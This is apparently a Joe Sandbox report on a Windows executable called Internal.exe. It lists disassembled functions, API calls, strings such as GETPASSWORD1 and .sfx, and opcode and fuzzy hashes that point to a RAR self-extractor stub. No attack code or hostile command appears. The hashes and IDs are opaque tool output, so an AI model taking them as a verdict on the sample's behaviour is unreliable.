                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: </p>$</style>$<br>$<style>$>
                                      • API String ID: 176396367-3568243669
                                      • Opcode ID: aa310a8ebeb15fdc8ce3fe2afd08d364c200ac7e6b4c094b295b92b4facebb60
                                      • Instruction ID: a53ad6c90a74c69e51d371dcc28c33583daf6b9cab90f94a763487117a20d243
                                      • Opcode Fuzzy Hash: aa310a8ebeb15fdc8ce3fe2afd08d364c200ac7e6b4c094b295b92b4facebb60
                                      • Instruction Fuzzy Hash: EA514C6778072395DB309A15DC2177F7BE5FFA1790F68041AF9C18B1CAFB658C8182A1
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 00512937
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0051293F
                                      • _ValidateLocalCookies.LIBCMT ref: 005129C8
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 005129F3
                                      • _ValidateLocalCookies.LIBCMT ref: 00512A48
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 994f661b7b4c06e963349275c21d5b951ef71afbfdb196deb56eea320348e12f
                                      • Instruction ID: d781ad17d8834879a5a753d60a3e72bb57bab579d177c6a57b1684e82279b658
                                      • Opcode Fuzzy Hash: 994f661b7b4c06e963349275c21d5b951ef71afbfdb196deb56eea320348e12f
                                      • Instruction Fuzzy Hash: 1641C134A00219AFDF10DF68C885AEEBFB5FF45324F148055E819AB392D771DAA5CB90
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                      • API String ID: 176396367-3743748572
                                      • Opcode ID: 4af15a5d9891ce94d8d1b9a6814e581049fb39d77fc63c5a258bffd1a806bf70
                                      • Instruction ID: 7e76015e7640bfc3132aa3745c02a2f9d89da1cb64569114727eaf442313e469
                                      • Opcode Fuzzy Hash: 4af15a5d9891ce94d8d1b9a6814e581049fb39d77fc63c5a258bffd1a806bf70
                                      • Instruction Fuzzy Hash: 6B31823274434666E630AB549C46BBF7BA4FBD0320F50881FF486472C5FB50AD8183A1
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0050AAD2
                                      • GetObjectW.GDI32(?,00000018,?), ref: 0050AB01
                                      • ReleaseDC.USER32(00000000,?), ref: 0050AB99
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: ObjectRelease
                                      • String ID: -P$7P$P
                                      • API String ID: 1429681911-3143175609
                                      • Opcode ID: ed69dac6dc0a45a3afcae435dbe4361b1c6cf8219ff37d746c7a245f6b207d30
                                      • Instruction ID: 2343409247252c83f4f4cb02b674fd91bed1b4aa558a6211b0023aed563473f2
                                      • Opcode Fuzzy Hash: ed69dac6dc0a45a3afcae435dbe4361b1c6cf8219ff37d746c7a245f6b207d30
                                      • Instruction Fuzzy Hash: 1A21FF72108304EFD3019F95DC4CD6FBFE9FB99392F040429FA4992170D7319A589B62
                                      APIs
                                        • Part of subcall function 0051C868: _free.LIBCMT ref: 0051C891
                                      • _free.LIBCMT ref: 0051C8F2
                                        • Part of subcall function 00518DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0051C896,005028B3,00000000,005028B3,00000000,?,0051C8BD,005028B3,00000007,005028B3,?,0051CCBA,005028B3), ref: 00518DE2
                                      • _free.LIBCMT ref: 0051C8FD
                                      • _free.LIBCMT ref: 0051C908
                                      • _free.LIBCMT ref: 0051C95C
                                      • _free.LIBCMT ref: 0051C967
                                      • _free.LIBCMT ref: 0051C972
                                      • _free.LIBCMT ref: 0051C97D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _free$FreeHeap
                                      • String ID:
                                      • API String ID: 2929853658-0
                                      • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                      • Instruction ID: 81c02f0a9ce02debf75c760f98a40c291333e6ba815e5bb9a0b0d2f306b86fd9
                                      • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                      • Instruction Fuzzy Hash: EF112CB1590B16BAF530B7B1CC4AFDB7FACBF80B00F400C19B29D66092DB66A585C750
                                      APIs
                                        • Part of subcall function 005005DA: _wcslen.LIBCMT ref: 005005E0
                                        • Part of subcall function 004FB92D: _wcsrchr.LIBVCRUNTIME ref: 004FB944
                                      • _wcslen.LIBCMT ref: 004FC197
                                      • _wcslen.LIBCMT ref: 004FC1DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmp
                                      Similarity
                                      • API ID: _wcslen$_wcsrchr
                                      • String ID: .exe$.rar$.sfx
                                      • API String ID: 3513545583-31770016
                                      • Opcode ID: a4e8ecb54bb8ca5e8922ff3478037b2d36f0504d3037749b49daceb7786041d4
                                      • Instruction ID: 09d1e58e89f1e15122733c5d397c441e1b88c36210e4bd0a3ce4b91521089dc1
                                      • Opcode Fuzzy Hash: a4e8ecb54bb8ca5e8922ff3478037b2d36f0504d3037749b49daceb7786041d4
                                      • Instruction Fuzzy Hash: E641562150032E99C735AF708A96A7F77A8FF42704F10494FFA816B2C1EB584D92C39A
                                      APIs
                                        • Part of subcall function 004FB690: _wcslen.LIBCMT ref: 004FB696
                                      • _swprintf.LIBCMT ref: 0050CED1
                                        • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                      • SetDlgItemTextW.USER32(?,00000066,0053946A), ref: 0050CEF1
                                      • _wcschr.LIBVCRUNTIME ref: 0050CF22
                                      • EndDialog.USER32(?,00000001), ref: 0050CFFE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: DialogItemText__vswprintf_c_l_swprintf_wcschr_wcslen
                                      • String ID: %s%s%u
                                      • API String ID: 3419047066-1360425832
                                      • Opcode ID: 492c19d2d0721032151b499cc9eae5179099e9f483a97c20faa0566f6c6e0c67
                                      • Instruction ID: 68f1a674d5c70db4a7e965e61dc83a5c63d84beb5d67631e7cb236785f830be3
                                      • Opcode Fuzzy Hash: 492c19d2d0721032151b499cc9eae5179099e9f483a97c20faa0566f6c6e0c67
                                      • Instruction Fuzzy Hash: 0941B0B1900659AADF219B90DC45BEE3BBCFB45300F4084A6FA09E7181EE708A44DF62
                                      APIs
                                      • _wcschr.LIBVCRUNTIME ref: 0050CD84
                                        • Part of subcall function 0050AF98: _wcschr.LIBVCRUNTIME ref: 0050B033
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: _wcschr
                                      • String ID: <$HIDE$MAX$MIN
                                      • API String ID: 2691759472-3358265660
                                      • Opcode ID: 54d2db19514717eb9953078bdf3f4797fcbaf79411bb36a72b89ecd4a7137d69
                                      • Instruction ID: 1fb8535b80930d8498daca0d4365b675321a0268e603f3454895b31e3b6e6afb
                                      • Opcode Fuzzy Hash: 54d2db19514717eb9953078bdf3f4797fcbaf79411bb36a72b89ecd4a7137d69
                                      • Instruction Fuzzy Hash: 2431727290061A9ADF25CB50DC45AEE7FBCFB55350F004666E905E71C0EBB09A848FA1
                                      APIs
                                        • Part of subcall function 004F1316: GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                        • Part of subcall function 004F1316: SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                      • EndDialog.USER32(?,00000001), ref: 0050B2BE
                                      • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0050B2D6
                                      • SetDlgItemTextW.USER32(?,00000067,?), ref: 0050B304
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: GETPASSWORD1$xzT
                                      • API String ID: 445417207-2147243542
                                      • Opcode ID: a7b1192b820b91b94c6e9c115de66571d25db57d65ebb6a611859ff74410f6f8
                                      • Instruction ID: 8f5484d2d04f617062e76263396c74675ea5678ae6f291151ad95398b12620b0
                                      • Opcode Fuzzy Hash: a7b1192b820b91b94c6e9c115de66571d25db57d65ebb6a611859ff74410f6f8
                                      • Instruction Fuzzy Hash: AF11E132900219B6EB219A649C99FFF3B6CFF19744F100421FA45B20D0C7A49A049761
                                      APIs
                                      • _swprintf.LIBCMT ref: 004FB9B8
                                        • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                      • _wcschr.LIBVCRUNTIME ref: 004FB9D6
                                      • _wcschr.LIBVCRUNTIME ref: 004FB9E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: _wcschr$__vswprintf_c_l_swprintf
                                      • String ID: %c:\
                                      • API String ID: 525462905-3142399695
                                      • Opcode ID: 6f8e52f8a3b2be49f3f88c80b7f068cd51fb87f5b38dad7b1da71db6a0f4f5a8
                                      • Instruction ID: a8d2d9e3e078e1850b7f8733492c01bbd0c8e84f435f55bf224ecb0dacd7f26a
                                      • Opcode Fuzzy Hash: 6f8e52f8a3b2be49f3f88c80b7f068cd51fb87f5b38dad7b1da71db6a0f4f5a8
                                      • Instruction Fuzzy Hash: EA01F5A350031669AA306B75DC46D7BABACEFD7770B40490FF754D6282EB38D89082F5
                                      APIs
                                      • LoadBitmapW.USER32(00000065), ref: 0050B6ED
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0050B712
                                      • DeleteObject.GDI32(00000000), ref: 0050B744
                                      • DeleteObject.GDI32(00000000), ref: 0050B767
                                        • Part of subcall function 0050A6C2: GlobalAlloc.KERNELBASE(00000002,00000000), ref: 0050A72D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: Object$Delete$AllocBitmapGlobalLoad
                                      • String ID: ]
                                      • API String ID: 399692894-3352871620
                                      • Opcode ID: 023481426d6c0f6877388e6437e519189a51d450ac2c7b72e93dde02373cbd0c
                                      • Instruction ID: 8d62dd9e2db7cb88ea0fb753fd40b2d583297a8d754e7c4723ec2a87164eeb95
                                      • Opcode Fuzzy Hash: 023481426d6c0f6877388e6437e519189a51d450ac2c7b72e93dde02373cbd0c
                                      • Instruction Fuzzy Hash: F501C436940306A7EB1277745C5DABF7EB9FFC0792F080010F900A72E1DF218D095662
                                      APIs
                                        • Part of subcall function 004F1316: GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                        • Part of subcall function 004F1316: SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                      • EndDialog.USER32(?,00000001), ref: 0050D64B
                                      • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0050D661
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 0050D675
                                      • SetDlgItemTextW.USER32(?,00000068), ref: 0050D684
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: RENAMEDLG
                                      • API String ID: 445417207-3299779563
                                      • Opcode ID: 39f5cb056847a14f80a731501d173f1f860ccc8c9539bd83be7980cd75b33404
                                      • Instruction ID: 8bcea308c5580d035a632e24eeab5db6f998e2d6629e62d1d882cc8d2d98b56b
                                      • Opcode Fuzzy Hash: 39f5cb056847a14f80a731501d173f1f860ccc8c9539bd83be7980cd75b33404
                                      • Instruction Fuzzy Hash: 0D01B533284314BAD2114FA8AD0DF6F7F6DBB6AB42F110511F705A20E0C6A39908A775
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: AdjustPointer$_abort
                                      • String ID:
                                      • API String ID: 2252061734-0
                                      • Opcode ID: e42efe85729e87b098923dfc81030b6952c7c90e5d765c7511315d27fc503206
                                      • Instruction ID: de042f2e3a871ef64ae3f0776cf1d5a52a86f870e551c4a1427fbb9eb8697699
                                      • Opcode Fuzzy Hash: e42efe85729e87b098923dfc81030b6952c7c90e5d765c7511315d27fc503206
                                      • Instruction Fuzzy Hash: 6F51D0B1600216AFFB288F14E849BEA7FA4FF54314F24452DE901476A1E731EDE1D790
                                      APIs
                                      • _free.LIBCMT ref: 0051C817
                                        • Part of subcall function 00518DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0051C896,005028B3,00000000,005028B3,00000000,?,0051C8BD,005028B3,00000007,005028B3,?,0051CCBA,005028B3), ref: 00518DE2
                                      • _free.LIBCMT ref: 0051C829
                                      • _free.LIBCMT ref: 0051C83B
                                      • _free.LIBCMT ref: 0051C84D
                                      • _free.LIBCMT ref: 0051C85F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: _free$FreeHeap
                                      • String ID:
                                      • API String ID: 2929853658-0
                                      • Opcode ID: 3690f7740f8d75714c8ab2c2893f2012e6ae862f0d47f1391d022da8fd08d360
                                      • Instruction ID: d2aa25fcaaf59151ae5bcb3d76c765ea6e54fd02fd9499ec58f87ab9aa69deb2
                                      • Opcode Fuzzy Hash: 3690f7740f8d75714c8ab2c2893f2012e6ae862f0d47f1391d022da8fd08d360
                                      • Instruction Fuzzy Hash: 35F01432540211ABA630AA68F8CACAA7FEDBF50B107650C19F108D7652CB71FCC0CA60
                                      APIs
                                      • _free.LIBCMT ref: 0051891E
                                        • Part of subcall function 00518DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0051C896,005028B3,00000000,005028B3,00000000,?,0051C8BD,005028B3,00000007,005028B3,?,0051CCBA,005028B3), ref: 00518DE2
                                      • _free.LIBCMT ref: 00518930
                                      • _free.LIBCMT ref: 00518943
                                      • _free.LIBCMT ref: 00518954
                                      • _free.LIBCMT ref: 00518965
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: _free$FreeHeap
                                      • String ID:
                                      • API String ID: 2929853658-0
                                      • Opcode ID: cfa6a74f49f0491231ac121bb51585f539c9880aad39986d5e4179ca6e776402
                                      • Instruction ID: ac0be85d48b61785ffa37c8b10d6f8a00b80a4123d2f011639e57a3a306b49aa
                                      • Opcode Fuzzy Hash: cfa6a74f49f0491231ac121bb51585f539c9880aad39986d5e4179ca6e776402
                                      • Instruction Fuzzy Hash: F5F082798103338BDA266F14FC564A53FB5FB37722B41090AF014562B1CF35498AFB81
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: _swprintf
                                      • String ID: %ls$%s: %s
                                      • API String ID: 589789837-2259941744
                                      • Opcode ID: 9af494793ab3f72a3cffa8800f1cc08eb0e1a3709978127395faf0ba902bd72f
                                      • Instruction ID: 89aadf003eec336cd2eaa2fe8cca42acfba269f6def2f3904205cbef9cc7af54
                                      • Opcode Fuzzy Hash: 9af494793ab3f72a3cffa8800f1cc08eb0e1a3709978127395faf0ba902bd72f
                                      • Instruction Fuzzy Hash: AB51C735288F04F6F7211A908E46F3E7E65BF15B04F248D06F387648E2D9A7A5506B1F
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: UNC$\\?\
                                      • API String ID: 176396367-253988292
                                      • Opcode ID: bb167736f21b3a910b080f64a0dcc6d68dfda2f733245e3285aadaae7d75fec4
                                      • Instruction ID: de88bf5762d98e82eb7d5e39e27a8b47cb126466f08cec19e97feb5eb7f54110
                                      • Opcode Fuzzy Hash: bb167736f21b3a910b080f64a0dcc6d68dfda2f733245e3285aadaae7d75fec4
                                      • Instruction Fuzzy Hash: 3241A33150025EA6DB21AF20CC05EFF7B69FF43394F10446BFA54A3291DB78DA918AE4
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: _free
                                      • String ID: (!U$C:\Users\user\Desktop\Internal.exe
                                      • API String ID: 269201875-2044512306
                                      • Opcode ID: 5cb28e8f637691f6513551f003fe9f64adc9f3b3ecf0af8d4e7384859ca34954
                                      • Instruction ID: ab98caafe361c1f6b122cbbc1ad85b1cd8a27725cf76b1eead91f036f95eba0a
                                      • Opcode Fuzzy Hash: 5cb28e8f637691f6513551f003fe9f64adc9f3b3ecf0af8d4e7384859ca34954
                                      • Instruction Fuzzy Hash: E6318071A0021DAFEB21DF99D888DEEBFB8FB99310F104066F80497211DB718A89DB51
                                      APIs
                                        • Part of subcall function 004F1316: GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                        • Part of subcall function 004F1316: SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                      • EndDialog.USER32(?,00000001), ref: 0050AD98
                                      • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0050ADAD
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 0050ADC2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: ASKNEXTVOL
                                      • API String ID: 445417207-3402441367
                                      • Opcode ID: 86bc42f2734a97de09048f268bcfa0e1b3ca28c0bfd5340c96d09e7fb569fa78
                                      • Instruction ID: d661e9c7549c0630fbc2aa77c456fea1f70b1f3a2b8de69df909d09593007dd7
                                      • Opcode Fuzzy Hash: 86bc42f2734a97de09048f268bcfa0e1b3ca28c0bfd5340c96d09e7fb569fa78
                                      • Instruction Fuzzy Hash: 8211BE33240710AFE3118F68AD49FAE3F69FB5A743F400411F241EA4F0C7629D09A72A
                                      APIs
                                      • DialogBoxParamW.USER32(GETPASSWORD1,00010400,0050B270,?,?), ref: 0050DE18
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: DialogParam
                                      • String ID: GETPASSWORD1$rP$xzT
                                      • API String ID: 665744214-3788108970
                                      • Opcode ID: 6ff20a9005197314403c4562188b5e6d4f361c6c0aa4a4fdc456f6e62545fb11
                                      • Instruction ID: a627da64993afd1b4e3043224b819cb1130881858be59ba2c8a1c2ffece0e2cf
                                      • Opcode Fuzzy Hash: 6ff20a9005197314403c4562188b5e6d4f361c6c0aa4a4fdc456f6e62545fb11
                                      • Instruction Fuzzy Hash: 92113832600248AADF119A34EC05BBF3FA8BB1A355F144465BD49EB1C0C7B4AC88D374
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: __fprintf_l_strncpy
                                      • String ID: $%s$@%s
                                      • API String ID: 1857242416-834177443
                                      • Opcode ID: 7a39a2fa5daa9a24aa8965a97c86974a3c13ed9cbadce85c751d43fe859d07de
                                      • Instruction ID: 2184c4296db374c82f51f59f3d6e61c3a92dbc3dfe08b9227d06edcd99901681
                                      • Opcode Fuzzy Hash: 7a39a2fa5daa9a24aa8965a97c86974a3c13ed9cbadce85c751d43fe859d07de
                                      • Instruction Fuzzy Hash: 7921967284024CAADB21DFA4CC05FEF7BE9AF06704F044423FA1096192E376D645CB56
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: Malloc
                                      • String ID: (P$2P$A
                                      • API String ID: 2696272793-1576226603
                                      • Opcode ID: 72799dc2782d0453f21b47c818585bacd0c6b7984c38c21834b82fbf293b1ae5
                                      • Instruction ID: 498d18c8c165f24399b58d3c63fe1fd3a005347172b25e573e3f634ba440a392
                                      • Opcode Fuzzy Hash: 72799dc2782d0453f21b47c818585bacd0c6b7984c38c21834b82fbf293b1ae5
                                      • Instruction Fuzzy Hash: 8C011B75901219ABCB14CFA4D8589EFBBF8AF09350B10415AE909E3350D7349A45DF94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                      • API String ID: 0-56093855
                                      • Opcode ID: 0dac316960ffff39cf7977639d030a7b21e1c1c4075438ac20ce8a0f8a184dfb
                                      • Instruction ID: d22fe1a2429d6fb5d2f13fac3c0573ae1fc5ccf9ad07c6a3608a640dfdd337c9
                                      • Opcode Fuzzy Hash: 0dac316960ffff39cf7977639d030a7b21e1c1c4075438ac20ce8a0f8a184dfb
                                      • Instruction Fuzzy Hash: 11015E7A604345AFDB158FA4FC48AAA7FB8F769398B040425F805827B0C6719858FBB0
                                      APIs
                                        • Part of subcall function 004FE2E8: _swprintf.LIBCMT ref: 004FE30E
                                        • Part of subcall function 004FE2E8: _strlen.LIBCMT ref: 004FE32F
                                        • Part of subcall function 004FE2E8: SetDlgItemTextW.USER32(?,0052E274,?), ref: 004FE38F
                                        • Part of subcall function 004FE2E8: GetWindowRect.USER32(?,?), ref: 004FE3C9
                                        • Part of subcall function 004FE2E8: GetClientRect.USER32(?,?), ref: 004FE3D5
                                      • GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                      • SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                      • String ID: P$0
                                      • API String ID: 2622349952-403496799
                                      • Opcode ID: f7f7f95873ba347bfce1b635708c612a398a0c8c626f708580e44d7dbd217b21
                                      • Instruction ID: ada5cb5f9081a73349e3bfb78372894d522bf322bcd945b1623ceb6b03ebbe1a
                                      • Opcode Fuzzy Hash: f7f7f95873ba347bfce1b635708c612a398a0c8c626f708580e44d7dbd217b21
                                      • Instruction Fuzzy Hash: E3F08C3110438CEAEF150F61880DABA3F98AF103A5F04851AFE8850AB1DB7CC994EE18
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: __alldvrm$_strrchr
                                      • String ID:
                                      • API String ID: 1036877536-0
                                      • Opcode ID: cf5ed7a10036d310a9347dfdacf332198bc42a51338ac969b190de77dd256315
                                      • Instruction ID: 72b13155d56a4b62c13fe5a05cbf6fb3e97f1b32be50bed649682f0644106a8d
                                      • Opcode Fuzzy Hash: cf5ed7a10036d310a9347dfdacf332198bc42a51338ac969b190de77dd256315
                                      • Instruction Fuzzy Hash: FDA135769042869FFB218E28C8A17EEBFE5FF51314F28456DE4859B281C2389DC1C791
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: _com_issue_error
                                      • String ID:
                                      • API String ID: 2162355165-0
                                      • Opcode ID: cd17ec3cf0a7e9d054715132d3d55c0661762c3d066516e7ddbd2919f6711aad
                                      • Instruction ID: d8b749e0432092c3e51afa8768f37c4c8ee2a575866312d9e1b606f78102ee53
                                      • Opcode Fuzzy Hash: cd17ec3cf0a7e9d054715132d3d55c0661762c3d066516e7ddbd2919f6711aad
                                      • Instruction Fuzzy Hash: 1D41F671A00219ABDB209F68DC4ABAEBFA8FF45710F104239F905E76D1D734A944C7A4
                                      APIs
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00512B16
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00512B2F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Value___vcrt_
                                      • String ID:
                                      • API String ID: 1426506684-0
                                      • Opcode ID: 2888e7f7cc4ac50b6090551960dfca2b452822de5eadf379e22d3932c2af01ac
                                      • Instruction ID: 78fcdc0e709999ad5f6aa0124f6f3500467a608afb5b6dbba14ed42833e9a332
                                      • Opcode Fuzzy Hash: 2888e7f7cc4ac50b6090551960dfca2b452822de5eadf379e22d3932c2af01ac
                                      • Instruction Fuzzy Hash: 7301DF3220C3126EF7342A747C9A9EA2F59FFA27B4F600B3AF110550E0EF114C96A244
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0050DC61
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050DC72
                                      • TranslateMessage.USER32(?), ref: 0050DC7C
                                      • DispatchMessageW.USER32(?), ref: 0050DC86
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Message$DispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 4217535847-0
                                      • Opcode ID: da266163829122e8f114b0f718d762b0dfe46150dbf942e296fcea4f464c1bc0
                                      • Instruction ID: 0d3cf4fbce7f62439dd99ced7bd296d058bb39799dd130fb3c87f237d7a36ce3
                                      • Opcode Fuzzy Hash: da266163829122e8f114b0f718d762b0dfe46150dbf942e296fcea4f464c1bc0
                                      • Instruction Fuzzy Hash: F5F03C72A01319BBCB206BA5DC4CDCF7F7DFF52792B004421B50AD20A0D674864ADBB0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID:
                                      • API String ID: 176396367-0
